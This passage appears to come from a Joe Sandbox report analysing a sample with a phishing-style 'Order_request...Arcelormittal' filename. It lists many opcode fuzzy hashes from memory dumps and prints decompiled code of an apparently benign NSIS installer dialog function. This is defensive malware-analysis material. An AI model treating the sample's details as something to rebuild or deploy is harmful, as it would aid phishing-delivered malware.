                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af1a53f46a591a0e2cd8d19338fc34587645e36698ae26adf44ddcbb9246284e
                                                              • Instruction ID: 135b3add5b36ed74d0a5e2e047567cc0fd100f883f93b0bea420f7dc4323c77a
                                                              • Opcode Fuzzy Hash: af1a53f46a591a0e2cd8d19338fc34587645e36698ae26adf44ddcbb9246284e
                                                              • Instruction Fuzzy Hash: 7C71EED3F2A319C9E753303086717E76780CF236C2E52875B8E2E715A2731F4A8A8594
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df570fa8c5265c315e117f283a945177a08bf90b9ff3ecb5db945819d2da1c22
                                                              • Instruction ID: 3b0bc67344bbdd59069748fea4b561b435613fc4c1393b90b7a00bf36a8090af
                                                              • Opcode Fuzzy Hash: df570fa8c5265c315e117f283a945177a08bf90b9ff3ecb5db945819d2da1c22
                                                              • Instruction Fuzzy Hash: 9B71BCD3F2A70589E7533034C1717E76681DF176C3E628B5B8E2B615A1B71B0ACA89C4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4df049c655fc24f67222ef5901d21ff76db1992fa045b55c5670ebc5378de507
                                                              • Instruction ID: 1e5a77dd94fe32e024b5fcbd4ac0f8f8ed998ff013dc3ed74d0c91dc6fc0525e
                                                              • Opcode Fuzzy Hash: 4df049c655fc24f67222ef5901d21ff76db1992fa045b55c5670ebc5378de507
                                                              • Instruction Fuzzy Hash: E561DCD3F2A70589E7533034C5717E66681CF136C3E628B178E2B616A1B72B09CE89D8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c015376e97407b3046d7ef2916404aba7bd49d015ce1c7dc7a755544cc8b8cd8
                                                              • Instruction ID: 3f258bb10ab48f4f7ad210b2e89cf95ed6f10f0a105d88465aa04e964571c105
                                                              • Opcode Fuzzy Hash: c015376e97407b3046d7ef2916404aba7bd49d015ce1c7dc7a755544cc8b8cd8
                                                              • Instruction Fuzzy Hash: DC61CED3F2A319C9E753303486717E76781CF236C2E52C75B8E2E715A2731F4A8A8594
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bbfdcba9d5631ddd62be3c20e1ed553fa193f49773b53221847c7261e53e13ba
                                                              • Instruction ID: f411731d63e185e20134c01fff84c1e367194d3fbb59858b31fe4c97789f3a56
                                                              • Opcode Fuzzy Hash: bbfdcba9d5631ddd62be3c20e1ed553fa193f49773b53221847c7261e53e13ba
                                                              • Instruction Fuzzy Hash: 5071CED3F2A315C9E753303086717E76781CF236C2F52875B8E2E72592B71F4A8A8594
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e308be93543376d8c38b956b9d23a92ac426610f1dbdc90c957233e533780823
                                                              • Instruction ID: 84c4bc89e7c0511dd8af3beb402534592506fabb7e3b6ded928cdada1ed235a6
                                                              • Opcode Fuzzy Hash: e308be93543376d8c38b956b9d23a92ac426610f1dbdc90c957233e533780823
                                                              • Instruction Fuzzy Hash: 2071BED7F2A70589E7533034C1717E66681DF136C3E628B178E2B615A1B71F0ACE89C8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1706f4cf11f218b984aa52bec162a8c3c5d4ea057a7e1fbd72d84a18e30e36f
                                                              • Instruction ID: 0bfe3b82eb4241db1eb0badc6aba8cf76cf79b23a5dc262058206da97861c92e
                                                              • Opcode Fuzzy Hash: f1706f4cf11f218b984aa52bec162a8c3c5d4ea057a7e1fbd72d84a18e30e36f
                                                              • Instruction Fuzzy Hash: D371ABD7F2A71589E7533034C1717E66681CF136C2E628B178E2A615A1B71F0ECE89C8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 643e775c65e8e2247bf957afe144a5d4f7cb9fb9a7a88cf24bd3a58b1c30cb65
                                                              • Instruction ID: b843c109b835634021ec9b1fe2c85e4466e20fa88f69e86d4eddd45e94487439
                                                              • Opcode Fuzzy Hash: 643e775c65e8e2247bf957afe144a5d4f7cb9fb9a7a88cf24bd3a58b1c30cb65
                                                              • Instruction Fuzzy Hash: F361CD93F2B70589E7533034C5317E75681CF136C2E518B1B8E2A615A1B72F09CE8988
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0ce76d6858da99bfcba6250e3050251061ad0592b4846dab4adebfab94ecbcdd
                                                              • Instruction ID: af2e73dcc639f2ed335fe729f76715c754e8af0c46a3f3bb540f7409a6006aef
                                                              • Opcode Fuzzy Hash: 0ce76d6858da99bfcba6250e3050251061ad0592b4846dab4adebfab94ecbcdd
                                                              • Instruction Fuzzy Hash: C861DED3F2A319D9E753303486717E76780CF236C2E52875B8E2E725A2731F4A8989D4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6812a990e78f6f6de9ccdef742809adb196183aab8cfa9f347d7be2b985b7193
                                                              • Instruction ID: d0cae630ea02e064b649c754da22748b26803721f5064ecafe7438aa657862c6
                                                              • Opcode Fuzzy Hash: 6812a990e78f6f6de9ccdef742809adb196183aab8cfa9f347d7be2b985b7193
                                                              • Instruction Fuzzy Hash: 9F51CBD7F2A315C9E753307086317E36741CF236D1F52875B8E6E725A2731F0A8A8994
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7804b8f7f85ff61015644a8df1cdd5327a41eebf59b327b5d670fe3290b811fa
                                                              • Instruction ID: 07497f7fee17a442d08c872bcb8c4026007954d29a1cba2d97768b4888dc84e2
                                                              • Opcode Fuzzy Hash: 7804b8f7f85ff61015644a8df1cdd5327a41eebf59b327b5d670fe3290b811fa
                                                              • Instruction Fuzzy Hash: CA4101A3F2A71589EB533034C5307E32A81CF136D2E908B57CE5A615A0B72F09CE8985
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: faf886a1d544da2b07be3b63d79c211937bcaf2d93b31a8e296ec57a4492eb0d
                                                              • Instruction ID: 08fc0e1ee9b2cc73435f62ff07cddb6aa801061b216f49d036821e23b006a946
                                                              • Opcode Fuzzy Hash: faf886a1d544da2b07be3b63d79c211937bcaf2d93b31a8e296ec57a4492eb0d
                                                              • Instruction Fuzzy Hash: A951FF93F2A7058DEB533034C5717E72A81CF136C2F518B57CE2A619A1B72F09CE8995
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a9413a2a2f0f6ba5e86221b25893707f059848fa8802ef94e96e5d9bc35597ee
                                                              • Instruction ID: 6f99555980b77109e89d14ff0a224bff1b067b353c84ce77e3d000d13919a387
                                                              • Opcode Fuzzy Hash: a9413a2a2f0f6ba5e86221b25893707f059848fa8802ef94e96e5d9bc35597ee
                                                              • Instruction Fuzzy Hash: FE517D71F003064FDB69AE3585B07EB37979F913D0F54822EDD4A87655D731C585CA01
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6dd4107f5f1d440a799a064e7a4152efd1493ad93c3dd476fa225cb055603885
                                                              • Instruction ID: f8b4c5a379b203221dffc58d0f14cb8b08735bf3ca4f1032d1293bfc1d8dbf7b
                                                              • Opcode Fuzzy Hash: 6dd4107f5f1d440a799a064e7a4152efd1493ad93c3dd476fa225cb055603885
                                                              • Instruction Fuzzy Hash: 765148B6A003498BDB30AE34CDA47DF3763FFA5380F958119DD889B605D7748686CB11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1eb40ade260d11f52328d123dcdc84f4c97ce87ea390f1e6a11be50daa5d353c
                                                              • Instruction ID: a84977b78d2ad85ef9283af7182ea6321a160e53e98babe1d05be1ce4fd8c810
                                                              • Opcode Fuzzy Hash: 1eb40ade260d11f52328d123dcdc84f4c97ce87ea390f1e6a11be50daa5d353c
                                                              • Instruction Fuzzy Hash: 2841AD30E013029FEB29AE7981B07F73797CF412D4B98826FDD4A87296DB21C585C741
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ca0f307974cb7dc35caab3a4327dfc362f765be477e8c722ac341fb84018b9a0
                                                              • Instruction ID: 1cc751ee117d8c808321df6831ac3de73e66dba3eab19d6e9fb30acca322ccde
                                                              • Opcode Fuzzy Hash: ca0f307974cb7dc35caab3a4327dfc362f765be477e8c722ac341fb84018b9a0
                                                              • Instruction Fuzzy Hash: 845133716043899FEB349E75CDA47EE37A6BF99390FA5812DDC8A87250D7718982CF00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d3ddd76b5b8ffa0e5c3d961305bf8e71f6e17bf7cd276a0b6579a7e1a336e7c
                                                              • Instruction ID: faf32e9bd5837ba6a1c1b69f93974e174f7d618119df56922d63c36b72a51537
                                                              • Opcode Fuzzy Hash: 5d3ddd76b5b8ffa0e5c3d961305bf8e71f6e17bf7cd276a0b6579a7e1a336e7c
                                                              • Instruction Fuzzy Hash: 77316472F043248FCB349D788AE87CA36A2AF9A350F5A403ADE059FA14D3708D85C641
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b759436621f835590c20f4c30e20b9890da5f612ca1d050a65c5c944636c9b1e
                                                              • Instruction ID: 1a051d0d06f7bfe151146aeb5b65177322415c74748a10b27777c699c816213a
                                                              • Opcode Fuzzy Hash: b759436621f835590c20f4c30e20b9890da5f612ca1d050a65c5c944636c9b1e
                                                              • Instruction Fuzzy Hash: 3F313675B0434A8BDB349F28C8E57DA33A2BF56750F658128EE968B612D7345581C701
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b8915623157b54b87ada7efdc4dd551f12713883e871558a34054c895e603b5
                                                              • Instruction ID: de4fcd370046d09becd0580a426fcf81ba450acc40e34398557854fad23d6f5b
                                                              • Opcode Fuzzy Hash: 3b8915623157b54b87ada7efdc4dd551f12713883e871558a34054c895e603b5
                                                              • Instruction Fuzzy Hash: 5EC09B303517408FC755CE1DC1D0F4573E5BF40A60B9586A8F421879D5C754D8408500
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 95%
                                                              			E00404293(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                              				char _v8;
                                                              				int _v12;
                                                              				void* _v16;
                                                              				struct HWND__* _t56;
                                                              				intOrPtr _t69;
                                                              				signed int _t75;
                                                              				signed short* _t76;
                                                              				signed short* _t78;
                                                              				long _t92;
                                                              				int _t103;
                                                              				signed int _t108;
                                                              				signed int _t110;
                                                              				intOrPtr _t111;
                                                              				intOrPtr _t113;
                                                              				WCHAR* _t114;
                                                              				signed int* _t116;
                                                              				WCHAR* _t117;
                                                              				struct HWND__* _t118;
                                                              
                                                              				if(_a8 != 0x110) {
                                                              					__eflags = _a8 - 0x111;
                                                              					if(_a8 != 0x111) {
                                                              						L13:
                                                              						__eflags = _a8 - 0x4e;
                                                              						if(_a8 != 0x4e) {
                                                              							__eflags = _a8 - 0x40b;
                                                              							if(_a8 == 0x40b) {
                                                              								 *0x79ff0c =  *0x79ff0c + 1;
                                                              								__eflags =  *0x79ff0c;
                                                              							}
                                                              							L27:
                                                              							_t114 = _a16;
                                                              							L28:
                                                              							return E0040415D(_a8, _a12, _t114);
                                                              						}
                                                              						_t56 = GetDlgItem(_a4, 0x3e8);
                                                              						_t114 = _a16;
                                                              						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
                                                              						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
                                                              							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
                                                              							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                              								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                              								_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                              								_v12 = _t103;
                                                              								__eflags = _t103 - _t113 - 0x800;
                                                              								_v16 = _t113;
                                                              								_v8 = 0x7a69e0;
                                                              								if(_t103 - _t113 < 0x800) {
                                                              									SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                              									SetCursor(LoadCursorW(0, 0x7f02));
                                                              									_t44 =  &_v8; // 0x7a69e0
                                                              									ShellExecuteW(_a4, L"open",  *_t44, 0, 0, 1);
                                                              									SetCursor(LoadCursorW(0, 0x7f00));
                                                              									_t114 = _a16;
                                                              								}
                                                              							}
                                                              						}
                                                              						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
                                                              						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
                                                              							goto L28;
                                                              						} else {
                                                              							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
                                                              							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                              								goto L28;
                                                              							}
                                                              							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
                                                              							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                              								SendMessageW( *0x7a8a48, 0x111, 1, 0);
                                                              							}
                                                              							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
                                                              							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                              								SendMessageW( *0x7a8a48, 0x10, 0, 0);
                                                              							}
                                                              							return 1;
                                                              						}
                                                              					}
                                                              					__eflags = _a12 >> 0x10;
                                                              					if(_a12 >> 0x10 != 0) {
                                                              						goto L27;
                                                              					}
                                                              					__eflags =  *0x79ff0c; // 0x0
                                                              					if(__eflags != 0) {
                                                              						goto L27;
                                                              					}
                                                              					_t69 =  *0x7a0f18; // 0x9ab874
                                                              					_t29 = _t69 + 0x14; // 0x9ab888
                                                              					_t116 = _t29;
                                                              					__eflags =  *_t116 & 0x00000020;
                                                              					if(( *_t116 & 0x00000020) == 0) {
                                                              						goto L27;
                                                              					}
                                                              					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                              					__eflags = _t108;
                                                              					 *_t116 = _t108;
                                                              					E00404118(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                              					E00404526();
                                                              					goto L13;
                                                              				} else {
                                                              					_t117 = _a16;
                                                              					_t75 =  *(_t117 + 0x30);
                                                              					if(_t75 < 0) {
                                                              						_t111 =  *0x7a7a1c; // 0x9ae6de
                                                              						_t75 =  *(_t111 - 4 + _t75 * 4);
                                                              					}
                                                              					_t76 =  *0x7a8a78 + _t75 * 2;
                                                              					_t110 =  *_t76 & 0x0000ffff;
                                                              					_a8 = _t110;
                                                              					_t78 =  &(_t76[1]);
                                                              					_a16 = _t78;
                                                              					_v16 = _t78;
                                                              					_v12 = 0;
                                                              					_v8 = E00404244;
                                                              					if(_t110 != 2) {
                                                              						_v8 = E0040420A;
                                                              					}
                                                              					_push( *((intOrPtr*)(_t117 + 0x34)));
                                                              					_push(0x22);
                                                              					E004040F6(_a4);
                                                              					_push( *((intOrPtr*)(_t117 + 0x38)));
                                                              					_push(0x23);
                                                              					E004040F6(_a4);
                                                              					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                              					E00404118( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                              					_t118 = GetDlgItem(_a4, 0x3e8);
                                                              					E0040412B(_t118);
                                                              					SendMessageW(_t118, 0x45b, 1, 0);
                                                              					_t92 =  *( *0x7a8a50 + 0x68);
                                                              					if(_t92 < 0) {
                                                              						_t92 = GetSysColor( ~_t92);
                                                              					}
                                                              					SendMessageW(_t118, 0x443, 0, _t92);
                                                              					SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                              					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                              					 *0x79ff0c = 0;
                                                              					SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                              					 *0x79ff0c = 0;
                                                              					return 0;
                                                              				}
                                                              			}





















                                                              0x004042a5
                                                              0x004043c5
                                                              0x004043d2
                                                              0x0040442f
                                                              0x0040442f
                                                              0x00404433
                                                              0x00404501
                                                              0x00404508
                                                              0x0040450a
                                                              0x0040450a
                                                              0x0040450a
                                                              0x00404510
                                                              0x00404510
                                                              0x00404513
                                                              0x00000000
                                                              0x0040451a
                                                              0x00404441
                                                              0x00404447
                                                              0x0040444a
                                                              0x00404451
                                                              0x00404453
                                                              0x0040445a
                                                              0x0040445c
                                                              0x0040445f
                                                              0x00404462
                                                              0x00404467
                                                              0x0040446d
                                                              0x00404470
                                                              0x00404477
                                                              0x00404484
                                                              0x00404495
                                                              0x0040449f
                                                              0x004044aa
                                                              0x004044b9
                                                              0x004044bf
                                                              0x004044bf
                                                              0x00404477
                                                              0x0040445a
                                                              0x004044c2
                                                              0x004044c9
                                                              0x00000000
                                                              0x004044cb
                                                              0x004044cb
                                                              0x004044d2
                                                              0x00000000
                                                              0x00000000
                                                              0x004044d4
                                                              0x004044d8
                                                              0x004044e8
                                                              0x004044e8
                                                              0x004044ea
                                                              0x004044ee
                                                              0x004044fa
                                                              0x004044fa
                                                              0x00000000
                                                              0x004044fe
                                                              0x004044c9
                                                              0x004043da
                                                              0x004043dd
                                                              0x00000000
                                                              0x00000000
                                                              0x004043e3
                                                              0x004043e9
                                                              0x00000000
                                                              0x00000000
                                                              0x004043ef
                                                              0x004043f4
                                                              0x004043f4
                                                              0x004043f7
                                                              0x004043fa
                                                              0x00000000
                                                              0x00000000
                                                              0x00404421
                                                              0x00404421
                                                              0x00404423
                                                              0x00404425
                                                              0x0040442a
                                                              0x00000000
                                                              0x004042ab
                                                              0x004042ab
                                                              0x004042ae
                                                              0x004042b3
                                                              0x004042b5
                                                              0x004042c4
                                                              0x004042c4
                                                              0x004042cc
                                                              0x004042cf
                                                              0x004042d3
                                                              0x004042d6
                                                              0x004042da
                                                              0x004042dd
                                                              0x004042e0
                                                              0x004042e3
                                                              0x004042ea
                                                              0x004042ec
                                                              0x004042ec
                                                              0x004042f6
                                                              0x00404303
                                                              0x0040430d
                                                              0x00404312
                                                              0x00404315
                                                              0x0040431a
                                                              0x00404331
                                                              0x00404338
                                                              0x0040434b
                                                              0x0040434e
                                                              0x00404362
                                                              0x00404369
                                                              0x0040436e
                                                              0x00404373
                                                              0x00404373
                                                              0x00404381
                                                              0x0040438f
                                                              0x004043a1
                                                              0x004043a6
                                                              0x004043b6
                                                              0x004043b8
                                                              0x00000000
                                                              0x004043be

                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404331
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404345
                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404362
                                                              • GetSysColor.USER32(?), ref: 00404373
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404381
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040438F
                                                              • lstrlenW.KERNEL32(?), ref: 00404394
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043A1
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043B6
                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040440F
                                                              • SendMessageW.USER32(00000000), ref: 00404416
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404441
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404484
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404492
                                                              • SetCursor.USER32(00000000), ref: 00404495
                                                              • ShellExecuteW.SHELL32(0000070B,open,iz,00000000,00000000,00000001), ref: 004044AA
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004044B6
                                                              • SetCursor.USER32(00000000), ref: 004044B9
                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044E8
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
